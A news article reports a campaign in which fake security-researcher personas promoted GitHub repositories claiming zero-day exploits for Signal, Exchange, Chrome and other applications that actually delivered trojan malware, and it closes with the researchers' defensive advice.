In an unusual attack campaign, a hacker has been setting up rogue GitHub repositories that claim to host zero-day exploits for popular applications but which instead deliver malware.
The attacker also created fake GitHub and Twitter accounts posing as security researchers and even used real photos of researchers from well-known cybersecurity firms.
"The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware," researchers from security firm VulnCheck, who found the rogue repositories, said in a report.
"It’s unclear if they have been successful but given that they’ve continued to pursue this avenue of attacks, it seems they believe they will be successful."
While attacks that target security researchers are not a new development, they are relatively rare and more likely to be the work of advanced persistent threat (APT) groups looking to gain access to sensitive information that researchers have access to.
This was the case with a campaign reported by Google's Threat Analysis Group in 2021 where a government-backed North Korean entity created a web of fake accounts posing as security researchers on Twitter, Telegram, LinkedIn, and other social media platforms and used them to promote proof-of-concept exploits for existing vulnerabilities that were posted on a blog and in YouTube videos.
How the GitHub fake account campaign works
The fake accounts were used to contact other real researchers and invite them to collaborate. As part of the communication, a Visual Studio project with proof-of-concept exploit code was shared, but this project also included a malicious DLL that deployed malware on the victim's computer.
Separately, some researchers who visited the blog had their up-to-date systems exploited suggesting the attackers had access to some zero-day exploits.
VulnCheck came across the first rogue repository in early May and reported it to GitHub, which promptly took it down. That repository claimed to host a zero-day remote code execution exploit for Signal, a popular secure communications app that's well regarded in the security community.
The attacker then continued to set up new accounts and repositories with fake exploits for Microsoft Exchange, Google Chrome, Discord, and Chromium.
All were set up by fake accounts claiming to belong to researchers who work for a company called High Sierra Cyber Security that doesn't seem to exist. Some of the same names and profile information were used to create Twitter accounts that were then used to promote the repositories, much like in the attack reported by Google.
However, the 2021 attack seems to have involved significantly more sophistication than this latest campaign and there's no evidence it's the work of the same attackers.
The malicious code distributed from the rogue GitHub repositories as a file called poc.py downloads one of two additional files depending on the operating system, one called cveslinux.zip, and one called cveswindows.zip. These archive files are then unpacked and the file inside is executed.
The Windows payload is detected by 36 antivirus programs on VirusTotal as a trojan program, while the Linux binary is flagged by 25.
"It isn’t clear if this is a single individual with too much time on their hands or something more advanced like the campaign uncovered by Google TAG in January 2021," the VulnCheck researchers said.
"Either way, security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing and don’t use anything you don’t understand."
Experienced security researchers generally take precautions when working with potentially malicious code. If they're testing a proof-of-concept exploit, this is most likely to happen on a test system inside a virtual machine that's well monitored and later wiped.
Executing such code on a work machine would most likely be a violation of standard security policies in most organisations, especially inside a cybersecurity company.